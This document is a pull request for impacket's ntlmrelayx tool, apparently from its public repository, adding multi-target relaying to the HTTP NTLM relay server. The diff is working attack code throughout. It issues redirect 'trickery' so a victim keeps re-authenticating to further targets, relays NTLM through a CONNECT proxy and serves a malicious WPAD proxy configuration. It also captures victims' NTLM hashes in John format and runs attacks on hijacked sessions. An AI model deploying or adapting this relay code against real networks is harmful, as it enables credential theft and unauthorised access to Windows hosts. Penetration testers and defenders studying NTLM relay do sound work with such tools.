### PR TITLE
HTTP multi-relay

### DIFF
--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -52,6 +52,7 @@ class HTTPRelayServer(Thread):
             self.machineHashes = None
             self.domainIp = None
             self.authUser = None
+            self.relayToHost = False
             self.wpad = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||' \
                         '(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "%s")) return "DIRECT"; ' \
                         'return "PROXY %s:80; DIRECT";} '
@@ -59,11 +60,6 @@ class HTTPRelayServer(Thread):
                 if self.server.config.target is None:
                     # Reflection mode, defaults to SMB at the target, for now
                     self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0])
-                self.target = self.server.config.target.getTarget()
-                if self.target is None:
-                    LOG.info("HTTPD: Received connection from %s, but there are no more targets left!" % client_address[0])
-                    return
-                LOG.info("HTTPD: Received connection from %s, attacking target %s://%s" % (client_address[0] ,self.target.scheme, self.target.netloc))
             try:
                 http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
             except Exception as e:
@@ -146,15 +142,21 @@ class HTTPRelayServer(Thread):
                 autorizationHeader = self.headers.get('Authorization')
             if autorizationHeader is None:
                 self.do_AUTHHEAD(message=b'NTLM')
-                pass
+                return
             else:
                 typeX = autorizationHeader
                 try:
                     _, blob = typeX.split('NTLM')
                     token = base64.b64decode(blob.strip())
-                except:
-                    self.do_AUTHHEAD()
-                messageType = struct.unpack('<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
+                except Exception:
+                    LOG.debug("Exception:", exc_info=True)
+                    self.do_AUTHHEAD(message = b'NTLM', proxy=proxy)
+                else:
+                    messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+
+            if self.relayToHost is False:
+                self.do_local_auth(messageType, token, proxy)
+                return
 
             if messageType == 1:
                 if not self.do_ntlm_negotiate(token, proxy=proxy):
@@ -163,24 +165,37 @@ class HTTPRelayServer(Thread):
             elif messageType == 3:
                 authenticateMessage = ntlm.NTLMAuthChallengeResponse()
                 authenticateMessage.fromString(token)
-                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
-                    LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
-                        self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('utf-16le'),
-                        authenticateMessage['user_name'].decode('utf-16le')))
+
+                if not self.do_ntlm_auth(token,authenticateMessage):
+                    LOG.info("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
+                        self.authUser))
+                    if authenticateMessage['user_name'] != '':
+                        self.server.config.target.logTarget(self.target)
+                        self.do_REDIRECT()
+                    else:
+                        #If it was an anonymous login, send 401
+                        self.do_AUTHHEAD(b'NTLM', proxy=proxy)
                 else:
-                    LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
-                        self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('ascii'),
-                        authenticateMessage['user_name'].decode('ascii')))
-                self.do_ntlm_auth(token, authenticateMessage)
-                self.do_attack()
+                    LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (self.target.scheme,
+                        self.target.netloc, self.authUser))
 
+                    self.server.config.target.logTarget(self.target, True, self.authUser)
+                    self.do_attack()
 
-                self.send_response(207, "Multi-Status")
-                self.send_header('Content-Type', 'application/xml')
-                self.send_header('Content-Length', str(len(content)))
-                self.end_headers()
-                self.wfile.write(content)
-                return
+                    self.target = self.server.config.target.getTarget(identity=self.authUser)
+                    if self.target is None:
+                        LOG.info( "HTTPD: Connection from %s@%s controlled, but there are no more targets left!" % (
+                            self.authUser, self.client_address[0]))
+                        self.send_response(207, "Multi-Status")
+                        self.send_header('Content-Type', 'application/xml')
+                        self.send_header('Content-Length', str(len(content)))
+                        self.send_header('Connection', 'close')
+                        self.end_headers()
+                        self.wfile.write(content)
+                        return
+                    LOG.info("HTTPD: Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser,
+                        self.client_address[0], self.target.scheme, self.target.netloc))
+                    self.do_REDIRECT()
 
         def do_AUTHHEAD(self, message = b'', proxy=False):
             if proxy:
@@ -191,15 +206,19 @@ class HTTPRelayServer(Thread):
                 self.send_header('WWW-Authenticate', message.decode('utf-8'))
             self.send_header('Content-type', 'text/html')
             self.send_header('Content-Length','0')
+            self.send_header('Connection', 'keep-alive')
             self.end_headers()
 
-        #Trickery to get the victim to sign more challenges
+        #Trickery to relay the victim to all the targets we want
         def do_REDIRECT(self, proxy=False):
             rstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
-            self.send_response(302)
-            self.send_header('WWW-Authenticate', 'NTLM')
+            self.send_response(307)
+            if proxy:
+                self.send_header('Proxy-Authenticate', 'NTLM')
+            else:
+                self.send_header('WWW-Authenticate', 'NTLM')
             self.send_header('Content-type', 'text/html')
-            self.send_header('Connection','close')
+            self.send_header('Connection','keep-alive')
             self.send_header('Location','/%s' % rstr)
             self.send_header('Content-Length','0')
             self.end_headers()
@@ -216,7 +235,100 @@ class HTTPRelayServer(Thread):
             return self.do_GET()
 
         def do_CONNECT(self):
-            return self.do_GET()
+            # Client is using our server as a Proxy
+            messageType = 0
+            self.relayToHost = True
+            proxy = True
+
+            LOG.info('HTTPD: PROXY Client requested path: %s' % self.path.lower())
+
+            if PY2:
+                proxyAuthHeader = self.headers.getheader('Proxy-Authorization')
+                autorizationHeader = self.headers.getheader('Authorization')
+            else:
+                proxyAuthHeader = self.headers.get('Proxy-Authorization')
+                autorizationHeader = self.headers.get('Authorization')
+
+            if (proxy and proxyAuthHeader is None) or (not proxy and autorizationHeader is None):
+                self.do_AUTHHEAD(message = b'NTLM',proxy=proxy)
+                return
+            else:
+                if proxy:
+                    typeX = proxyAuthHeader
+                else:
+                    typeX = autorizationHeader
+                try:
+                    _, blob = typeX.split('NTLM')
+                    token = base64.b64decode(blob.strip())
+                except Exception:
+                    LOG.debug("Exception:", exc_info=True)
+                    self.do_AUTHHEAD(message = b'NTLM', proxy=proxy)
+                else:
+                    messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+
+            # Acting as a proyy we can't know the user identity before relay it, so we have to do the one-shot attack
+            if messageType == 1:
+                self.target = self.server.config.target.getOneShotTarget()
+                if self.target is None:
+                    LOG.info("HTTPD: Received connection via PROXY from %s, but there are no more targets left!",
+                             self.client_address[0])
+                    self.do_not_found()
+                    return
+
+                LOG.info("HTTPD: Connection via PROXY from %s controlled, trying to attack target %s://%s" % (
+                    self.client_address[0], self.target.scheme,self.target.netloc))
+
+                if not self.do_ntlm_negotiate(token, proxy=proxy):
+                    # Connection failed
+                    LOG.error('Negotiating NTLM with %s://%s failed', self.target.scheme, self.target.netloc)
+                    self.server.config.target.logTarget(self.target)
+                    self.do_not_found()
+                    return
+
+            elif messageType == 3:
+                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+                authenticateMessage.fromString(token)
+
+                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                else:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                authenticateMessage['user_name'].decode('ascii'))).upper()
+
+                target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
+
+                # At this point we know the identity of the target, let's check if we've already relayed it.
+                if self.server.config.target.checkFinishedAttacks(target) is True:
+                    LOG.info("HTTPD: Target %s@%s already attacked, discarding PROXY connection" % (self.authUser,
+                        self.target.netloc))
+                    self.do_not_found()
+                    return
+
+                if not self.do_ntlm_auth(token,authenticateMessage):
+                    LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
+                        self.authUser))
+                    self.server.config.target.logTarget(self.target)
+                    self.do_not_found()
+                    return
+                else:
+                    # Relay worked, do whatever we want here...
+                    LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc,
+                                                                               self.authUser))
+                    ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
+                                                        authenticateMessage['user_name'],
+                                                        authenticateMessage['domain_name'],
+                                                        authenticateMessage['lanman'], authenticateMessage['ntlm'])
+                    self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
+
+                    if self.server.config.outputFile is not None:
+                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
+
+                    self.server.config.target.logTarget(self.target, True, self.authUser)
+                    self.do_attack()
+                    # We can't use the redirect trick, closing connection...
+                    self.do_not_found()
+                    return
 
         def do_GET(self):
             messageType = 0
@@ -236,7 +348,7 @@ class HTTPRelayServer(Thread):
                 return
 
             # Determine if the user is connecting to our server directly or attempts to use it as a proxy
-            if self.command == 'CONNECT' or (len(self.path) > 4 and self.path[:4].lower() == 'http'):
+            if len(self.path) > 4 and self.path[:4].lower() == 'http':
                 proxy = True
             else:
                 proxy = False
@@ -250,7 +362,7 @@ class HTTPRelayServer(Thread):
 
             if (proxy and proxyAuthHeader is None) or (not proxy and autorizationHeader is None):
                 self.do_AUTHHEAD(message = b'NTLM',proxy=proxy)
-                pass
+                return
             else:
                 if proxy:
                     typeX = proxyAuthHeader
@@ -265,11 +377,17 @@ class HTTPRelayServer(Thread):
                 else:
                     messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
 
+            # Should we relay or log-in locally?
+            if self.relayToHost is False:
+                self.do_local_auth(messageType, token, proxy)
+                return
+
+            # We can start the relay process
             if messageType == 1:
                 if not self.do_ntlm_negotiate(token, proxy=proxy):
-                    #Connection failed
-                    LOG.error('Negotiating NTLM with %s://%s failed. Skipping to next target',
-                              self.target.scheme, self.target.netloc)
+                    # Connection failed
+                    LOG.error('Negotiating NTLM with %s://%s failed. Skipping to next target', self.target.scheme,
+                        self.target.netloc)
                     self.server.config.target.logTarget(self.target)
                     self.do_REDIRECT()
             elif messageType == 3:
@@ -277,17 +395,8 @@ class HTTPRelayServer(Thread):
                 authenticateMessage.fromString(token)
 
                 if not self.do_ntlm_auth(token,authenticateMessage):
-                    if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
-                        LOG.error("Authenticating against %s://%s as %s\\%s FAILED" % (
-                            self.target.scheme, self.target.netloc,
-                            authenticateMessage['domain_name'].decode('utf-16le'),
-                            authenticateMessage['user_name'].decode('utf-16le')))
-                    else:
-                        LOG.error("Authenticating against %s://%s as %s\\%s FAILED" % (
-                            self.target.scheme, self.target.netloc,
-                            authenticateMessage['domain_name'].decode('ascii'),
-                            authenticateMessage['user_name'].decode('ascii')))
-
+                    LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
+                        self.authUser))
                     # Only skip to next if the login actually failed, not if it was just anonymous login or a system account
                     # which we don't want
                     if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
@@ -295,18 +404,12 @@ class HTTPRelayServer(Thread):
                         # No anonymous login, go to next host and avoid triggering a popup
                         self.do_REDIRECT()
                     else:
-                        #If it was an anonymous login, send 401
+                        # If it was an anonymous login, send 401
                         self.do_AUTHHEAD(b'NTLM', proxy=proxy)
                 else:
                     # Relay worked, do whatever we want here...
-                    if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
-                        LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
-                            self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('utf-16le'),
-                            authenticateMessage['user_name'].decode('utf-16le')))
-                    else:
-                        LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
-                            self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('ascii'),
-                            authenticateMessage['user_name'].decode('ascii')))
+                    LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme, self.target.netloc,
+                         self.authUser))
 
                     ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
                                                         authenticateMessage['user_name'],
@@ -318,21 +421,26 @@ class HTTPRelayServer(Thread):
                         writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'], self.server.config.outputFile)
 
                     self.server.config.target.logTarget(self.target, True, self.authUser)
-
                     self.do_attack()
 
-                    # Serve image and return 200 if --serve-image option has been set by user
-                    if (self.server.config.serve_image):
-                        self.serve_image()
+                    # Let's grab our next target
+                    self.target = self.server.config.target.getTarget(identity=self.authUser)
+
+                    if self.target is None:
+                        LOG.info("HTTPD: Connection from %s@%s controlled, but there are no more targets left!" % (
+                            self.authUser, self.client_address[0]))
+                        # Serve image and return 200 if --serve-image option has been set by user
+                        if (self.server.config.serve_image):
+                            self.serve_image()
+                            return
+                        # And answer 404 not found
+                        self.do_not_found()
                         return
 
-                    # And answer 404 not found
-                    self.send_response(404)
-                    self.send_header('WWW-Authenticate', 'NTLM')
-                    self.send_header('Content-type', 'text/html')
-                    self.send_header('Content-Length','0')
-                    self.send_header('Connection','close')
-                    self.end_headers()
+                    # We have the next target, let's keep relaying...
+                    LOG.info("HTTPD: Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser,
+                        self.client_address[0], self.target.scheme, self.target.netloc))
+                    self.do_REDIRECT()
             return
 
         def do_ntlm_negotiate(self, token, proxy):
@@ -358,19 +466,11 @@ class HTTPRelayServer(Thread):
                 LOG.error('Protocol Client for %s not found!' % self.target.scheme.upper())
                 return False
 
-            #Calculate auth
+            # Calculate auth
             self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(self.challengeMessage.getData()), proxy=proxy)
             return True
 
         def do_ntlm_auth(self,token,authenticateMessage):
-            #For some attacks it is important to know the authenticated username, so we store it
-            if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
-                self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
-                                            authenticateMessage['user_name'].decode('utf-16le'))).upper()
-            else:
-                self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
-                                            authenticateMessage['user_name'].decode('ascii'))).upper()
-
             if authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1':
                 clientResponse, errorCode = self.client.sendAuth(token)
             else:
@@ -382,6 +482,75 @@ class HTTPRelayServer(Thread):
                 return True
 
             return False
+
+        def do_local_auth(self, messageType, token, proxy):
+            if messageType == 1:
+                negotiateMessage = ntlm.NTLMAuthNegotiate()
+                negotiateMessage.fromString(token)
+                ansFlags = 0
+
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_56:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_56
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_128:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_128
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_UNICODE
+                if negotiateMessage['flags'] & ntlm.NTLM_NEGOTIATE_OEM:
+                    ansFlags |= ntlm.NTLM_NEGOTIATE_OEM
+
+                ansFlags |= ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
+                            ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_NTLM
+
+                challengeMessage = ntlm.NTLMAuthChallenge()
+                challengeMessage['flags'] = ansFlags
+                challengeMessage['domain_name'] = ""
+                challengeMessage['challenge'] = ''.join(random.choice(string.printable) for _ in range(64))
+                challengeMessage['TargetInfoFields'] = ntlm.AV_PAIRS()
+                challengeMessage['TargetInfoFields_len'] = 0
+                challengeMessage['TargetInfoFields_max_len'] = 0
+                challengeMessage['TargetInfoFields_offset'] = 40 + 16
+                challengeMessage['Version'] = b'\xff' * 8
+                challengeMessage['VersionLen'] = 8
+
+                self.do_AUTHHEAD(message=b'NTLM ' + base64.b64encode(challengeMessage.getData()),proxy=proxy)
+                return
+
+            elif messageType == 3:
+                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+                authenticateMessage.fromString(token)
+
+                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                else:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                authenticateMessage['user_name'].decode('ascii'))).upper()
+
+                self.target = self.server.config.target.getTarget(identity = self.authUser)
+
+                if self.target is None:
+                    LOG.info("HTTPD: Connection from %s@%s controlled, but there are no more targets left!" %
+                        (self.authUser, self.client_address[0]))
+                    self.do_not_found()
+                    return
+
+                LOG.info("HTTPD: Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser,
+                    self.client_address[0], self.target.scheme, self.target.netloc))
+
+                self.relayToHost = True
+                self.do_REDIRECT()
+
+        def do_not_found(self):
+            self.send_response(404)
+            self.send_header('WWW-Authenticate', 'NTLM')
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Content-Length', '0')
+            self.send_header('Connection', 'close')
+            self.end_headers()
 
         def do_attack(self):
             # Check if SOCKS is enabled and if we support the target scheme

--- a/impacket/examples/ntlmrelayx/servers/httprelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/httprelayserver.py
@@ -176,7 +176,7 @@ class HTTPRelayServer(Thread):
                         #If it was an anonymous login, send 401
                         self.do_AUTHHEAD(b'NTLM', proxy=proxy)
                 else:
-                    LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (self.target.scheme,
+                    LOG.info("Authenticating against %s://%s as %s SUCCEED" % (self.target.scheme,
                         self.target.netloc, self.authUser))
 
                     self.server.config.target.logTarget(self.target, True, self.authUser)

--- a/impacket/examples/ntlmrelayx/utils/targetsutils.py
+++ b/impacket/examples/ntlmrelayx/utils/targetsutils.py
@@ -108,6 +108,37 @@ class TargetsProcessor:
                 newTarget = urlparse('%s://%s@%s%s' % (target.scheme, gotUsername.replace('/','\\'), target.netloc, target.path))
                 self.finishedAttacks.append(newTarget)
 
+    # In some attacks we can't know the victim identity before relay it, so we have to check if we've already relayed it.
+    def checkFinishedAttacks(self, target):
+        for finishedTarget in self.finishedAttacks:
+            tmpTarget = '%s://%s' % (finishedTarget.scheme, finishedTarget.netloc)
+            if target.upper() == tmpTarget.upper():
+                return True
+        return False
+
+    # Getting targets in old school attack scenarios.
+    def getOneShotTarget(self):
+        if len(self.generalCandidates) > 0:
+             return self.generalCandidates.pop()
+        else:
+            if len(self.originalTargets) > 0:
+                self.generalCandidates = [x for x in self.originalTargets if
+                                          x not in self.finishedAttacks and x.username is None]
+
+        if len(self.namedCandidates) > 0:
+            for target in self.namedCandidates:
+                if target.username is not None:
+                    self.namedCandidates.remove(target)
+                    return target
+
+        if len(self.generalCandidates) == 0:
+            if len(self.namedCandidates) == 0:
+                #We are here, which means all the targets are already exhausted by the client
+                LOG.info("All targets processed!")
+            return None
+        else:
+            return self.generalCandidates.pop()
+
     def getTarget(self, identity=None):
         # ToDo: We should have another list of failed attempts (with user) and check that inside this method so we do not
         # retry those targets.


### PR DESCRIPTION
Attempt to add multi-relay capabilities to the HTTP Relay Server. This PR includes:

- Use the redirect trick in as many scenarios as possible.
- Targets processing modification to add support to one-shot attack scenarios. There are some scenarios where we are not able to know the victim identity before relay it (e.g. CONNECT connections). 
- Test needed in some POST scenario (e.g. privexchange.py).